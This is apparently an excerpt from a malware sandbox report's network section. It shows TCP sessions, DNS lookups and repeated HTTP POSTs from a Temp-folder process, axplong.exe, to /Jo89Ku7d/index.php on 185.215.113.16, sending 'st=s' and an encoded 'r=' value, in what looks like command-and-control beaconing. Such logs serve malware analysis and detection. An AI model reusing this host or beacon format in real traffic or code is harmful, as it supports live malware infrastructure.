                    Sep 27, 2024 01:30:04.339409113 CEST4976280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:04.339445114 CEST4976380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:04.339654922 CEST4976380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:04.344618082 CEST8049763185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:05.059338093 CEST8049763185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:05.059410095 CEST4976380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.084356070 CEST4976380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.085541964 CEST4976480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.090009928 CEST8049763185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:05.090063095 CEST4976380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.090424061 CEST8049764185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:05.090601921 CEST4976480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.133985996 CEST4976480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.138891935 CEST8049764185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:05.786137104 CEST8049764185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:05.786319017 CEST4976480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.896668911 CEST4976480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.896987915 CEST4976580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.902199030 CEST8049764185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:05.902410984 CEST8049765185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:05.902461052 CEST4976480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.902506113 CEST4976580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.902647972 CEST4976580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:05.907427073 CEST8049765185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:06.623245001 CEST8049765185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:06.623456955 CEST4976580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:06.626457930 CEST4976580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:06.626765966 CEST4976680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:06.631520033 CEST8049766185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:06.631580114 CEST8049765185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:06.631611109 CEST4976680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:06.631632090 CEST4976580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:06.631886005 CEST4976680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:06.636722088 CEST8049766185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:07.335659027 CEST8049766185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:07.335726023 CEST4976680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:07.557830095 CEST4976680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:07.564416885 CEST8049766185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:07.568432093 CEST4976680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:07.588582993 CEST4976780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:07.593419075 CEST8049767185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:07.593631983 CEST4976780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:07.594947100 CEST4976780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:07.599771976 CEST8049767185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:08.331073046 CEST8049767185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:08.331167936 CEST4976780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:08.334306002 CEST4976780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:08.334600925 CEST4976880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:08.339441061 CEST8049768185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:08.339453936 CEST8049767185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:08.339513063 CEST4976880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:08.339543104 CEST4976780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:08.339634895 CEST4976880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:08.344409943 CEST8049768185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:09.146142006 CEST8049768185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:09.146195889 CEST4976880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:09.255831003 CEST4976880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:09.256174088 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:09.260942936 CEST8049768185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:09.260957003 CEST8049769185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:09.261001110 CEST4976880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:09.261029959 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:09.261218071 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:09.265916109 CEST8049769185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.735990047 CEST8049769185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.736207008 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.736929893 CEST8049769185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.737061024 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.738190889 CEST8049769185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.738315105 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.739702940 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.740071058 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.745831013 CEST8049770185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.745910883 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.745984077 CEST8049769185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.746217012 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.746455908 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.751440048 CEST8049770185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:11.497175932 CEST8049770185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:11.497251034 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.616457939 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.617089987 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.621666908 CEST8049770185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:11.621716976 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.621871948 CEST8049771185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:11.621929884 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.622029066 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.626713991 CEST8049771185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:12.326397896 CEST8049771185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:12.326478004 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.329912901 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.330202103 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.334897995 CEST8049771185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:12.334966898 CEST8049772185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:12.334975004 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.335078001 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.335261106 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.339976072 CEST8049772185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.056163073 CEST8049772185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.056225061 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.167184114 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.167560101 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.172463894 CEST8049772185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.172482014 CEST8049773185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.172545910 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.172772884 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.173177004 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.177939892 CEST8049773185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.871176004 CEST8049773185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.871259928 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.874805927 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.875118017 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.880080938 CEST8049773185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.880224943 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.880263090 CEST8049774185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.880551100 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.880822897 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.885839939 CEST8049774185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:14.618988037 CEST8049774185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:14.619066000 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:14.725117922 CEST4977580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:14.725471020 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:15.096714973 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:15.724850893 CEST8049775185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:15.724917889 CEST8049774185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:15.724982977 CEST4977580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:15.725775003 CEST8049774185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:15.725895882 CEST4977480192.168.2.7185.215.113.16

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 27, 2024 01:28:05.989511967 CEST5292953192.168.2.71.1.1.1
                    Sep 27, 2024 01:28:07.503690958 CEST6232353192.168.2.71.1.1.1

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Sep 27, 2024 01:28:05.989511967 CEST192.168.2.71.1.1.10x2a69Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                    Sep 27, 2024 01:28:07.503690958 CEST192.168.2.71.1.1.10xfa4cStandard query (0)time.windows.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Sep 27, 2024 01:28:05.996236086 CEST1.1.1.1192.168.2.70x2a69No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                    Sep 27, 2024 01:28:07.510807037 CEST1.1.1.1192.168.2.70xfa4cNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • 185.215.113.16

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.749706185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:02.128978968 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:02.843842983 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:02.871293068 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:03.102998972 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.749707185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:03.211956978 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:03.922878027 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:03.923852921 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:04.152101994 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.749709185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:04.260428905 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:05.128912926 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:05.129687071 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:05.354912996 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.749710185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:05.464993954 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:06.154469967 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:06.155379057 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:06.611717939 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Sep 27, 2024 01:29:06.627655983 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.749711185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:06.727642059 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:07.453269005 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:07.454080105 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:07.688414097 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.749712185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:07.805768967 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:08.869272947 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:08.869434118 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:08.870712996 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:09.128109932 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.749713185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:09.243869066 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:10.046972036 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:10.048017025 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
